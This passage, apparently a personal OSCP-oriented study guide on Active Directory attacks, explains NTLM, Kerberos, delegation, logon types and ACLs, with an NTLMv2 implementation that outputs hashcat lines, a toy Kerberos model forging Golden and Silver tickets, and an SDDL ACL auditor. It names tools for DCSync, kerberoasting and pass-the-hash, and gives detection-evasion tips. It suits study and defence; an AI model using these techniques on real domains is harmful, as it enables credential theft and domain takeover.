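    """NTOWFv1: MD4 of the UTF-16LE password. This is what SAM, NTDS.dit and LSASS hold."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain, UTF-16LE."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_blob(client_challenge: bytes, target_info: bytes, filetime: int) -> bytes:
    """The 'temp' structure: RespType 1, HiRespType 1, reserved, FILETIME, client nonce, reserved, AV_PAIRs, reserved."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime) + client_challenge
            + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NtChallengeResponse = NTProofStr || blob, NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob).
    Only the NT hash goes in: a stolen hash is as good as the password (pass the hash)."""
    proof = hmac.new(ntowf_v2(nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def session_base_key(nt: bytes, user: str, domain: str, nt_proof_str: bytes) -> bytes:
    """Key material for signing/sealing; a relay attacker who only forwarded the messages cannot compute it."""
    return hmac.new(ntowf_v2(nt, user, domain), nt_proof_str, hashlib.md5).digest()


def server_verify(nt: bytes, user: str, domain: str, server_challenge: bytes, response: bytes) -> bool:
    """What the DC does over Netlogon for a domain account: recompute NTProofStr from the stored hash."""
    expected = hmac.new(ntowf_v2(nt, user, domain), server_challenge + response[16:], hashlib.md5).digest()
    return hmac.compare_digest(expected, response[:16])


def hashcat_5600_line(user: str, domain: str, server_challenge: bytes, response: bytes) -> str:
    """user::domain:serverchallenge:NTProofStr:blob, the line Responder/ntlmrelayx log for hashcat -m 5600."""
    return f"{user}::{domain}:{server_challenge.hex()}:{response[:16].hex()}:{response[16:].hex()}"


def demo() -> dict:
    """Constructed scenario: anakin@CONTOSO authenticates; an attacker later needs only nt."""
    user, domain, password = "anakin", "CONTOSO", "Winter2024!"
    server_challenge = bytes.fromhex("0123456789abcdef")            # 8-byte nonce from CHALLENGE (sample)
    client_challenge = bytes.fromhex("aaaaaaaaaaaaaaaa")            # client nonce (sample)
    target_info = b"\x02\x00\x0e\x00" + domain.encode("utf-16-le") + b"\x00" * 4   # MsvAvNbDomainName + MsvAvEOL
    blob = ntlmv2_blob(client_challenge, target_info, 0x01DA9E0000000000)        # sample FILETIME
    nt = nt_hash(password)                                          # an attacker would read this from LSASS/NTDS
    resp = ntlmv2_response(nt, user, domain, server_challenge, blob)
    return {
        "nt_hash": nt.hex(),
        "response": resp,
        "verified": server_verify(nt, user, domain, server_challenge, resp),
        "rejected_with_other_challenge": not server_verify(nt, user, domain, bytes(8), resp),
        "session_base_key": session_base_key(nt, user, domain, resp[:16]).hex(),
        "hashcat": hashcat_5600_line(user, domain, server_challenge, resp),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value.hex() if isinstance(value, bytes) else value)
```

Three things the code makes visible: nt_hash() is all a client ever needs (pass the hash); the server can only verify because it holds that same hash, which is why a member server forwards the check to a DC; and session_base_key() needs the NT hash too, so a relay attacker who merely forwards the response cannot sign traffic when signing is required. The hashcat_5600_line() output has the same shape as the lines Responder and ntlmrelayx write to their logs.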
Kerberos
What are Kerberos principal types?
A principal is a unique identity to which Kerberos can assign tickets; principals represent users, services or hosts within the Kerberos realm (the domain). Users normally have NT-PRINCIPAL names. Services are addressed with the service principal types NT-SRV-INST (service and instance, such as krbtgt/CONTOSO.LOCAL), NT-SRV-HST (service and host, such as cifs/dc01.contoso.local) and NT-SRV-XHST (service and host with additional components); in Active Directory these correspond to the SPNs (servicePrincipalName) registered on accounts.
What is a ticket in kerberos?
Tickets are partially encrypted structures that contain:
- The target principal (usually a service) for which the ticket applies
- Information related to the client, such as the name and domain
- A key to establish secure channels between the client and the service
- Timestamps to determine the period in which the ticket is valid
What is the PAC in active directory?
The Privilege Attribute Certificate (PAC) is an extension Microsoft adds to Kerberos tickets (TGTs and service tickets alike, in their authorization-data field) that carries the user's identity and group memberships, so that a service can build the user's access token without contacting a DC. It is created by the domain controller when it issues the TGT and copied into every service ticket derived from it.
What information does the PAC contain?
The PAC includes information about the client:
- the domain name and SID
- the username and user RID
- the RIDs (GroupIds) of the domain groups the user belongs to
- other SIDs (ExtraSids) of non-domain groups, used for inter-domain authentication (this is where SID history travels)
And also several signatures used to verify the integrity of the PAC and ticket data:
- Server signature: created with the key that encrypts the ticket (the service's key). This is the only one a service normally verifies.
- KDC signature: a signature of the server signature created with the KDC (krbtgt) key. It would let a service confirm that the PAC really came from the KDC and so defeat Silver tickets, but services do not verify it unless they ask the DC for PAC validation, which is rare.
- Ticket signature: a signature of the whole ticket created with the KDC key, introduced in 2020 (CVE-2020-17049) to stop the Bronze Bit attack.
What is Privileged Attribute Certificate (PAC)? (Lepide Blog)
What are the 3 actors Kerberos uses to authenticate users against services?
- The client: the user that receives the tickets and wants to access a service in the domain.
- The service or application server: the machine that offers the service the user wants to access.
- The KDC (Key Distribution Center): the entity with access to the database of keys required to authenticate users; in Active Directory every Domain Controller is a KDC.
What are the 2 types of tickets?
STs (Service Tickets), which a client presents to an application server/service in order to get access to it. The KDC issues STs to the clients that request them.
Be aware that a TGS is not a ST: according to RFC 4120 the TGS (Ticket Granting Service) is the part of the KDC that issues service tickets (calling the ticket itself a "TGS" is a mimikatz/impacket habit).
The other type of ticket is the TGT (Ticket Granting Ticket). In order to get a ST from the KDC we present our TGT, which proves that we already authenticated.
TGTs are encrypted with the key of the krbtgt account of the domain, known as the KDC key. Therefore, if you can retrieve the key of the krbtgt account (stored in the domain database), you can create custom TGTs, known as Golden tickets.
How are tickets issued?
Through three exchanges: AS-REQ/AS-REP, where the client proves its identity to the KDC (pre-authentication, by default a timestamp encrypted with the user's key) and receives a TGT plus a session key; TGS-REQ/TGS-REP, where the client presents the TGT and an authenticator and receives a ST for the requested SPN plus a new session key; and AP-REQ/AP-REP, where the client presents the ST and an authenticator to the service, which decrypts the ticket with its own key and, without talking to the KDC, trusts the identity and PAC found inside.
What Kerberos-related services listen on ports 88 and 464?
The DC listens for Kerberos (the AS and TGS exchanges) on port 88/TCP and 88/UDP.
Another service, kpasswd, can be found on port 464/TCP and 464/UDP of the DCs; it allows changing the password of domain users (it is what kpasswd clients use, and it works even when SMB/RPC is filtered).
What happens to the Kerberos keys when you change your password?
By changing the password, the user changes the Kerberos keys used to encrypt the Kerberos messages and tickets: the RC4 key is the NT hash itself, and the AES keys are derived from the password with PBKDF2 and a salt built from the realm and the user name. Tickets already issued keep working until they expire, since they are encrypted with the krbtgt or service keys, not with the user's.
Basic Attacks
Kerberos Attack Scenarios (Gist)
What are some Kerberos erros related to Brute Force?
- KDC_ERR_PREAUTH_FAILED: Incorrect password
- KDC_ERR_C_PRINCIPAL_UNKNOWN: Invalid username
- KDC_ERR_WRONG_REALM: Invalid domain
- KDC_ERR_CLIENT_REVOKED: Disabled/Blocked user
What are some tools used for kerberos bruteforce?
Rubeus brute, kerbrute (Go), kerbrute (Python) or cerbero
What is kerberoasting?
Most services run under machine accounts, whose passwords are random, 120 characters long and rotated every 30 days, so cracking their tickets is hopeless. But some services are registered (with an SPN) on regular user accounts: the ST is then encrypted with a key derived from that user's password, which is usually human-chosen and far more crackable.
The Kerberoast attack consists of requesting STs for the SPNs of regular user accounts (any authenticated user can) and cracking them offline to recover the passwords. Users that run services often also have privileges, so these are juicy accounts. Requesting RC4 tickets (etype 23, hashcat mode 13100) gives the fastest cracking but is also what detections look for (event 4769 with encryption type 0x17); AES tickets (modes 19600/19700) are slower to crack but quieter.
For this attack we can use the impacket GetUserSPNs.py script, the Rubeus kerberoast command or the Invoke-Kerberoast.ps1 script.
What is ASREProasting?
AS-REP roasting tool from the goat: https://github.com/Yaxxine7/ASRepCatcher/
When Kerberos pre-authentication is disabled on an account (the DONT_REQ_PREAUTH flag), anyone can send an AS-REQ for it without knowing its password, and the KDC answers with an AS-REP. That reply contains data encrypted with the user's key, so it can be cracked offline (hashcat mode 18200) to recover the password.
We can use tools such as the impacket GetNPUsers.py script, the Rubeus asreproast command or the ASREPRoast.ps1 script, then crack the hash locally.
Explain Pass the Key/Over Pass the Hash.
Over Pass The Hash / Pass The Key (HackTricks)
To request a TGT we do not need the password but a Kerberos key derived from it. With RC4 that key is exactly the NT hash, so an NT hash taken from LSASS or NTDS.dit can be used to obtain a TGT as the user (over pass the hash); with an AES key it is called pass the key. Using RC4 in a domain that normally uses AES stands out in the logs (4768 with encryption type 0x17), so prefer the AES key when you have it.
What is Pass the Ticket?
The Pass the Ticket technique consists of stealing a ticket (TGT or ST) together with its session key and reusing them to impersonate the user and access resources or services. Tickets live in LSASS memory (mimikatz sekurlsa::tickets /export, Rubeus dump) and can be moved between the Windows (.kirbi) and Linux (ccache) formats.
What are Golden/Silver tickets?
In Active Directory the Kerberos TGTs are encrypted with the keys of the krbtgt account. Knowing those keys, custom TGTs, known as Golden Tickets, can be created for any user with any group membership, and the KDC will issue STs for them. The equivalent with a service's key (typically a machine account NT hash) is a Silver Ticket: a forged ST for that one service, which never touches the KDC.
To get the krbtgt keys you need access to the Active Directory database. You can do this by performing a remote DCSync attack, with the mimikatz lsadump::dcsync command or the impacket secretsdump.py script, or by dumping the NTDS.dit file locally with ntdsutil or from a shadow copy (vssadmin). Forge with the AES key rather than the RC4/NT hash when you can, for the same detection reasons as above.
Golden Ticket Attacks (GitBook)
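The following is an added example (my own toy model, not code from the page, mimikatz or impacket) of the issuance flow described under "How are tickets issued?" and of why the krbtgt key and a service key give Golden and Silver tickets. A miniature KDC runs the AS and TGS exchanges, a service validates an AP-REQ, and then the attacker forges tickets. Encryption is a SHA-256 keystream with an HMAC tag standing in for AES, the group list stands in for the PAC, and every principal, key and group is constructed; nothing here is the real Kerberos wire format.

```python
import hashlib
import hmac
import json
import os
import time

# Added example, not code from the page, mimikatz or impacket: a toy model of
# Kerberos ticket issuance (AS and TGS exchanges, AP-REQ at the service) and of
# the Golden/Silver ticket forgeries that follow from holding the krbtgt key or
# a service key. seal()/unseal() (SHA-256 keystream + HMAC tag) stand in for
# AES, the "groups" list stands in for the PAC, and all principals, keys and
# groups are constructed. Nothing here is the real Kerberos wire format.


def _stream(key: bytes, nonce: bytes, n: int) -> bytes:
    return b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest() for i in range(n // 32 + 1))


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC with a random nonce; only the holder of `key` can read or forge it."""
    nonce = os.urandom(16)
    ct = bytes(p ^ s for p, s in zip(plaintext, _stream(key, nonce, len(plaintext))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def unseal(key: bytes, blob: bytes) -> bytes:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, hashlib.sha256).digest(), tag):
        raise ValueError("KRB_AP_ERR_MODIFIED: wrong key or tampered data")
    return bytes(c ^ s for c, s in zip(ct, _stream(key, nonce, len(ct))))


def make_ticket(target_key, client, service, session_key, groups, lifetime=600):
    """A ticket is sealed with the *target's* long-term key; it names the client, the session key and its 'PAC'."""
    body = {"client": client, "service": service, "session_key": session_key.hex(),
            "groups": groups, "expires": time.time() + lifetime}
    return seal(target_key, json.dumps(body).encode())


def authenticator(session_key, client):
    """Proof that the presenter knows the session key carried inside the ticket."""
    return seal(session_key, json.dumps({"client": client, "ts": time.time()}).encode())


def check(ticket_key, ticket, auth):
    t = json.loads(unseal(ticket_key, ticket))
    a = json.loads(unseal(bytes.fromhex(t["session_key"]), auth))
    if a["client"] != t["client"] or t["expires"] < time.time():
        raise ValueError("KRB_AP_ERR_BADMATCH or KRB_AP_ERR_TKT_EXPIRED")
    return t


class KDC:
    def __init__(self, keys, groups):
        self.keys, self.groups = keys, groups          # principal -> long-term key / group list

    def as_exchange(self, client, preauth):
        """AS-REQ/AS-REP: pre-auth is a timestamp sealed with the client key; returns TGT + sealed session key."""
        ts = float(unseal(self.keys[client], preauth).decode())   # ValueError here = KDC_ERR_PREAUTH_FAILED
        if abs(time.time() - ts) > 300:
            raise ValueError("KRB_AP_ERR_SKEW")
        sk = os.urandom(16)
        tgt = make_ticket(self.keys["krbtgt"], client, "krbtgt", sk, self.groups.get(client, []))
        return tgt, seal(self.keys[client], sk)

    def tgs_exchange(self, tgt, auth, service):
        """TGS-REQ/TGS-REP: whatever the TGT says is trusted, since only the krbtgt key could have sealed it."""
        t = check(self.keys["krbtgt"], tgt, auth)
        svc_sk = os.urandom(16)
        st = make_ticket(self.keys[service], t["client"], service, svc_sk, t["groups"])
        return st, seal(bytes.fromhex(t["session_key"]), svc_sk)


def service_accept(service_key, st, auth):
    """AP-REQ at the service: only the service key is needed; the KDC is never consulted."""
    t = check(service_key, st, auth)
    return {"client": t["client"], "groups": t["groups"]}


def legit_access(kdc, keys, client, service):
    tgt, sealed_sk = kdc.as_exchange(client, seal(keys[client], str(time.time()).encode()))
    sk = unseal(keys[client], sealed_sk)
    st, sealed_svc_sk = kdc.tgs_exchange(tgt, authenticator(sk, client), service)
    return service_accept(keys[service], st, authenticator(unseal(sk, sealed_svc_sk), client))


def golden_ticket(kdc, krbtgt_key, service, who="Administrator"):
    """With the krbtgt key (DCSync / NTDS.dit) forge a TGT; the KDC issues STs for it without question."""
    sk = os.urandom(16)
    tgt = make_ticket(krbtgt_key, who, "krbtgt", sk, ["Domain Admins"], lifetime=10 * 365 * 86400)
    st, sealed_svc_sk = kdc.tgs_exchange(tgt, authenticator(sk, who), service)
    return st, unseal(sk, sealed_svc_sk)


def silver_ticket(service_key, service, who="Administrator"):
    """With only the service's key (its machine account hash) forge a ST; the KDC is not involved at all."""
    sk = os.urandom(16)
    return make_ticket(service_key, who, service, sk, ["Domain Admins"]), sk


def demo():
    keys = {"krbtgt": os.urandom(16), "anakin": os.urandom(16), "cifs/fs01": os.urandom(16)}
    kdc = KDC(keys, {"anakin": ["Domain Users"]})
    legit = legit_access(kdc, keys, "anakin", "cifs/fs01")
    st, svc_sk = golden_ticket(kdc, keys["krbtgt"], "cifs/fs01")
    golden = service_accept(keys["cifs/fs01"], st, authenticator(svc_sk, "Administrator"))
    st, sk = silver_ticket(keys["cifs/fs01"], "cifs/fs01")
    silver = service_accept(keys["cifs/fs01"], st, authenticator(sk, "Administrator"))
    try:                                                # a guessed service key fails the tag check
        st, sk = silver_ticket(os.urandom(16), "cifs/fs01")
        service_accept(keys["cifs/fs01"], st, authenticator(sk, "Administrator"))
        wrong_key_accepted = True
    except ValueError:
        wrong_key_accepted = False
    return {"legit": legit, "golden": golden, "silver": silver, "wrong_key_accepted": wrong_key_accepted}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The model shows the two facts that matter: the KDC checks nothing about a TGT beyond "it decrypts and verifies with the krbtgt key", and the service never contacts the KDC, so a ST sealed with the service key is accepted on its own. Real Kerberos adds the PAC signatures described earlier, but only the server signature, also made with the service key, is normally verified, which is why silver tickets survive them.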
How does kerberos work with services accross domains?
A KDC (DC) can only issue STs for the services of its own domain. So to reach a service in another domain we have to ask that domain's DC for the ST, and for that we need a TGT its KDC accepts. That TGT, known as an inter-realm TGT (or referral ticket), is issued by our own KDC when we ask it for a ST of a service that lives in another domain.
here is the schema:
(diagram: client --TGS-REQ for a bar.com service--> KDC foo.com --inter-realm TGT--> client --TGS-REQ--> KDC bar.com --ST--> client)
Can you tell me more about Inter-realm TGTs?
Forest Privilege Escalation - Domain Trusts (HackTricks)
This TGT is exactly like a normal one except that it is encrypted with the inter-realm trust key, the secret shared by both sides of a trust, instead of the krbtgt key.
To get the inter-realm trust key you just need to dump the domain database: it is the password of the trust account (the other domain's NetBIOS name followed by $), so DCSync or an NTDS.dit dump retrieves it.
Finally, once you have the trust key, you can create an inter-realm ticket with the mimikatz kerberos::golden command or the impacket ticketer.py script and use it like any other ticket. Across a forest trust, SID filtering strips the ExtraSids from the PAC, so the group memberships you can smuggle in are limited to the trusted domain's own groups.
Kerberos Delegation
Can you explain kerberos delegation?
Let's say we are a user of a website. When we make a request, the web server fetches the document we asked for from a file server, but how does the file server know what we, rather than the web server, are allowed to read? Delegation makes it possible for the web server to "impersonate" the user and authenticate to the file server as that user; the file server then sees the request as if the user had made it directly.
What's the difference between Unconstrained and Constrained Delegation?
In Kerberos Unconstrained Delegation the client sends a copy of its own TGT (with its session key) inside the ST it presents to the service. The service can then use that TGT, without any constraint, to ask for STs to any other service on behalf of the client. Those TGTs sit in the LSASS memory of the service host, so compromising a host with unconstrained delegation yields the TGTs of everyone who connected to it.
To create a more secure form of delegation Microsoft developed two Kerberos extensions known as Service for User (S4U): S4U2Self lets a service obtain a ST to itself on behalf of a user (protocol transition), and S4U2Proxy lets it exchange that ST for a ST to one of the allowed third-party services (listed in its msDS-AllowedToDelegateTo attribute). No user TGT is required and nothing is cached on the service server. This is known as constrained delegation.
Logon types
Explain why there are different logon types.
In order to log users on, both locally and remotely, Windows defines different types of logons (the Logon Type field of event 4624). Not every logon type can be used by every user (user rights such as "Allow log on locally" or "Log on as a service" control that), and several of them cache credentials in the LSASS process, or even in the LSA secrets, which is interesting for a pentester to recover.
Can you explain the different logon types?
- Interactive (type 2): a user logs on at the console with a username and password (or smart card), usually through the GUI or a runas. Credentials (NT hash, Kerberos tickets, possibly the plaintext with WDigest) are cached in LSASS for single sign-on.
- Network (type 3): a user or computer accesses a network resource on this host (SMB share, WinRM, LDAP...) with NTLM or Kerberos. Nothing reusable is cached on the target, which is why lateral movement over the network does not leak credentials to the server it touches.
- Batch (type 4): a program or script runs as a user through the Task Scheduler, with credentials stored for it. This is what automated tasks, backups and maintenance jobs use.
- Service (type 5): a Windows service starts under a specific account. The password is kept in the LSA secrets so that the service can be started again, which makes service account credentials recoverable from a compromised host.
- NetworkCleartext (type 8): a network logon in which the server receives the password itself (IIS basic authentication is the classic case), so the cleartext is available in LSASS on the server side. The transport may well be encrypted (HTTPS); the name refers to what the server gets to see.
- NewCredentials (type 9): the caller keeps its current token locally but supplies alternate credentials to be used for outbound network connections (runas /netonly). Nothing is validated at logon time; the credentials are only tested when a remote resource is accessed, which is why this type works with bogus or hash-only credentials.
- RemoteInteractive (type 10): an interactive logon through Terminal Services/Remote Desktop (RDP). As with type 2, the credentials are cached in the LSASS of the remote host, which is why connecting with RDP to a compromised machine using a privileged account is dangerous (Restricted Admin mode and Remote Credential Guard exist to avoid exactly that).
Other types exist (7 Unlock, 11 CachedInteractive for logons with cached domain credentials), but the ones above are the ones you meet in the logs.
Authorization
We are now authenticated in the domain. Now the domain, its services and programs must know our permissions, and based on them decide whether we can access certain objects:
What are security descriptors?
Every object in Active Directory has a security descriptor. It is checked whenever we need to verify whether a user has access to a certain object, and it holds the owner, the primary group, the DACL (who is allowed or denied what) and the SACL (what is audited). It is stored in binary form (the nTSecurityDescriptor attribute) but can also be rendered in the Security Descriptor String Format, SDDL.
What is the difference between ACLs and ACEs?
ACLs, DACLs, SACLs, ACEs (HackTricks)
- ACLs (Access Control Lists): lists of permissions granted or denied to users and groups for a particular object. The DACL defines who can access the object and what they can do; the SACL defines which accesses are audited.
- ACEs (Access Control Entries): the individual entries within an ACL. Each ACE names a trustee (a user or group SID), an allow/deny type and a set of rights; in Active Directory an object-specific ACE can also restrict the right to one property, property set or extended right (for example DS-Replication-Get-Changes, the right behind DCSync).
ACLs provide the overall permission structure of an object, and ACEs define the specific permissions of each trustee within that structure. For a pentester the interesting ACEs are the ones that grant GenericAll, WriteDacl, WriteOwner, GenericWrite or a dangerous extended right on an object to a principal we control.
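As an added example (my own code, not from the page or from HackTricks), here is a small SDDL parser that turns the string form of a DACL into ACEs and reports which trustees can take over the object or hold a dangerous extended right. The right and trustee abbreviations and the three extended-right GUIDs are the standard Windows ones; the descriptor SAMPLE_SDDL, the S-1-5-21-1-2-3-* SIDs and the all-zero property GUID are constructed.

```python
import re

# Added example, not code from the original page: parse the DACL of a security
# descriptor given in SDDL and flag ACEs that hand control of the object to a
# trustee. Abbreviations are the standard SDDL ones; the sample descriptor and
# the S-1-5-21-1-2-3-* SIDs below are constructed for illustration.

ACCESS_RIGHTS = {
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
    "WD": "WRITE_DAC", "WO": "WRITE_OWNER", "RC": "READ_CONTROL", "SD": "DELETE",
    "CC": "CREATE_CHILD", "DC": "DELETE_CHILD", "LC": "LIST_CHILDREN", "SW": "SELF_WRITE",
    "RP": "READ_PROPERTY", "WP": "WRITE_PROPERTY", "DT": "DELETE_TREE", "LO": "LIST_OBJECT",
    "CR": "CONTROL_ACCESS",
}
WELL_KNOWN = {
    "SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators", "DA": "Domain Admins",
    "EA": "Enterprise Admins", "DU": "Domain Users", "AU": "Authenticated Users",
    "WD": "Everyone", "AO": "Account Operators", "PS": "Principal Self", "CO": "Creator Owner",
}
# Rights that let the trustee take over the object outright (the usual BloodHound ACL edges)
TAKEOVER = {"GENERIC_ALL", "GENERIC_WRITE", "WRITE_DAC", "WRITE_OWNER", "WRITE_PROPERTY"}
# Extended rights (control access rights) worth flagging, keyed by their rightsGuid
EXTENDED_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
}

SDDL_RE = re.compile(
    r"^(?:O:(?P<owner>[^:()]+?))?(?:G:(?P<group>[^:()]+?))?"
    r"(?:D:(?P<dflags>[A-Z]*)(?P<dacl>(?:\([^)]*\))*))?"
    r"(?:S:(?P<sflags>[A-Z]*)(?P<sacl>(?:\([^)]*\))*))?$"
)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")


def parse_rights(field: str) -> set:
    """Rights come as two-letter codes glued together ('RPLCLORC') or as a hex mask."""
    if field.lower().startswith("0x"):
        return {"raw:" + field}
    return {ACCESS_RIGHTS.get(field[i:i + 2], field[i:i + 2]) for i in range(0, len(field), 2)}


def parse_sddl(sddl: str) -> dict:
    """Owner, primary group, DACL control flags and the DACL ACEs (the SACL is kept as a string)."""
    m = SDDL_RE.match(sddl)
    if not m:
        raise ValueError("not a well-formed SDDL string")
    aces = []
    for ace_type, flags, rights, obj, inh, sid in ACE_RE.findall(m.group("dacl") or ""):
        aces.append({"type": ace_type, "flags": flags, "rights": parse_rights(rights),
                     "object": obj.lower(), "inherit_object": inh.lower(), "trustee": sid})
    return {"owner": m.group("owner"), "group": m.group("group"),
            "dacl_flags": m.group("dflags") or "", "dacl": aces, "sacl": m.group("sacl") or ""}


def audit(sddl: str) -> list:
    """Return (trustee, finding) pairs for ACEs that grant control of the object."""
    findings = []
    for ace in parse_sddl(sddl)["dacl"]:
        if ace["type"] not in ("A", "OA"):
            continue                      # deny (D/OD) and audit (AU) ACEs grant nothing
        who = WELL_KNOWN.get(ace["trustee"], ace["trustee"])
        if not ace["object"]:             # plain ACE, or object ACE without a GUID: covers the whole object
            hits = sorted(ace["rights"] & TAKEOVER)
            if hits:
                findings.append((who, "takeover:" + ",".join(hits)))
        elif "CONTROL_ACCESS" in ace["rights"] and ace["object"] in EXTENDED_RIGHTS:
            findings.append((who, "extended-right:" + EXTENDED_RIGHTS[ace["object"]]))
        # an OA with WP and a property GUID covers one attribute only and is judged case by case
    return findings


# Constructed descriptor: SYSTEM and Domain Admins have full control, Authenticated Users can read,
# Everyone is denied WRITE_DAC, RID 1104 can rewrite the DACL/owner, RID 1105 holds the DCSync right,
# RID 1106 may write one attribute (made-up GUID) only.
SAMPLE_SDDL = (
    "O:DAG:DAD:PAI(A;;GA;;;SY)(A;CI;GA;;;DA)(A;;RPLCLORC;;;AU)(D;;WD;;;WD)"
    "(A;;WDWO;;;S-1-5-21-1-2-3-1104)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1-2-3-1105)"
    "(OA;;WP;00000000-0000-0000-0000-000000000001;;S-1-5-21-1-2-3-1106)"
)

if __name__ == "__main__":
    for trustee, finding in audit(SAMPLE_SDDL):
        print(f"{trustee}: {finding}")
```

On a real object you would obtain the string with (Get-Acl "AD:\<distinguishedName>").Sddl from the ActiveDirectory PowerShell module. The parser deliberately ignores Deny ACEs and property-specific WriteProperty ACEs (they cover one attribute, not the object), which is the same distinction BloodHound draws; the SIDs it prints would still have to be resolved to see whether the trustee is a group you are a member of.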
Privileges
What are some dangers of misconfigured privileges?
In AD some privileges can be abused and lead to malicious actions. SeBackupPrivilege allows reading any file on the machine regardless of its ACL (in order to back it up); on a Domain Controller this can be used to copy the NTDS.dit domain database and the SYSTEM hive (the file is locked while the DC runs, so it is taken from a shadow copy or with backup-semantics tools such as robocopy /b or diskshadow).
SeDebugPrivilege allows debugging any process on the machine, so we can read LSASS memory or inject code into a privileged process, which leads to privilege escalation. SeRestorePrivilege allows writing any file (as if restoring a backup) regardless of its ACL; on a Domain Controller this can be used to modify the domain database or to plant files that run as SYSTEM.
Here is an interesting article with POCs about privilege abuse: https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt
Group Policy
What are Group policies?
Group Policy is a mechanism to apply a set of rules/actions to the users and computers of an Active Directory domain. The rules are defined in Group Policy Objects (GPOs), which are linked to sites, domains or OUs; each GPO defines a series of settings applied to the machines and users under that link. Write access to a GPO (or the ability to link one) is therefore a path to code execution on every machine it applies to.
What are some actions you can make through Group policies?
- Disable NTLM
- Require password complexity
- Execute a scheduled or immediate task
- Create local users in computers
- Set a default wallpaper
- Synchronize files with OneDrive
Communication Protocols
What do you know about SMB?
SMB (Server Message Block) is the protocol used to share files and printers and to communicate between Windows machines; it runs on port 445/TCP (and on 139/TCP over NetBIOS in old setups). It also carries the named pipes through which many RPC services (SAMR, LSARPC, the service control manager used by psexec) are reached.
From a pentester's point of view it is an interesting protocol: shares often contain valuable information (scripts with credentials, backups, SYSVOL with Group Policy preferences), and SMB authentication is where NTLM relay and pass the hash are exercised.
Shares are folders a machine exposes so that they can be accessed by other computers/users of the network.
What do you know about HTTP in an active directory context?
HTTP is the protocol of the web.
It is also used as a transport by many other protocols present in an Active Directory domain, such as WinRM (and thus PowerShell Remoting), RPC over HTTP and ADWS (Active Directory Web Services), as well as by intranet web applications.
HTTP supports authentication with both NTLM and Kerberos (and Basic). This matters from a security perspective because HTTP endpoints can be both the source and the target of NTLM relay attacks, and can be reached through Kerberos delegation.
What can you say about RPC?
Remote Procedure Call (RPC, in Windows the MSRPC flavour of DCE/RPC) is the protocol used in Active Directory for communication between clients, servers and the services of the directory itself (replication, SAM and LSA management, service control, Netlogon). It lets a program on one computer call a function on a remote system, either directly over TCP (the endpoint mapper on port 135 hands out the dynamic port of each service) or over SMB named pipes; many of the tools mentioned in this document (secretsdump.py, psexec.py, DCSync) are simply sequences of RPC calls.
What can you say about WinRM
Windows Remote Management (WinRM) is a protocol for the remote management of Windows systems, including those of an Active Directory domain. It is Microsoft's implementation of WS-Management (WS-Man), a SOAP-over-HTTP standard for systems to manage each other over a network; it listens on 5985/TCP (HTTP) and 5986/TCP (HTTPS).
WinRM lets administrators perform remote management tasks, such as running scripts, reading event logs and managing services on remote systems of the domain. By default it is usable by local Administrators and by members of the Remote Management Users group, which is what Enter-PSSession and evil-winrm rely on.
What can you say about SSH?
SSH (Secure Shell) is a protocol for accessing and managing Unix-like systems such as Linux (recent Windows versions ship an OpenSSH server as well). Even if it is not directly related to Active Directory, the Linux machines deployed in a domain can usually be reached through SSH. It gives the user a shell on the remote system, transfers files (with the scp/sftp utilities) and establishes SSH tunnels, which is what makes it useful for pivoting.
What are the 3 types of port forwarding with SSH?
Local Port Forwarding (the -L local_port:target_host:target_port option)
- The goal of local port forwarding is to access a service running on (or reachable from) a remote server as if it were running locally. Imagine you want to reach a web server running on remote_host's port 80 through your local port 8080: after setting up the forwarding, opening http://localhost:8080 in your browser connects to remote_host's web server through the SSH connection.
Remote Port Forwarding (the -R remote_port:target_host:target_port option)
- The goal of remote port forwarding is to redirect a port of the SSH server to a local destination, giving the remote side access to a service on our machine. Imagine you want a remote user to reach a web server running on your local machine's port 8080: after executing the command, opening http://ssh_server:8080 connects to your local web server (by default the SSH server binds such ports to its loopback only, unless GatewayPorts is enabled in its configuration).
Dynamic Port Forwarding (the -D local_port option)
- The goal of dynamic port forwarding is to create a SOCKS proxy that routes any number of connections through the SSH tunnel, so that the traffic of several applications is tunneled over a single SSH connection. Imagine you want to route your web traffic through an SSH server: after executing the command, configuring your browser (or proxychains) to use localhost:8080 as a SOCKS proxy routes its traffic through the SSH server.
That is all for now. More will be added soon after OSCP, stay tuned.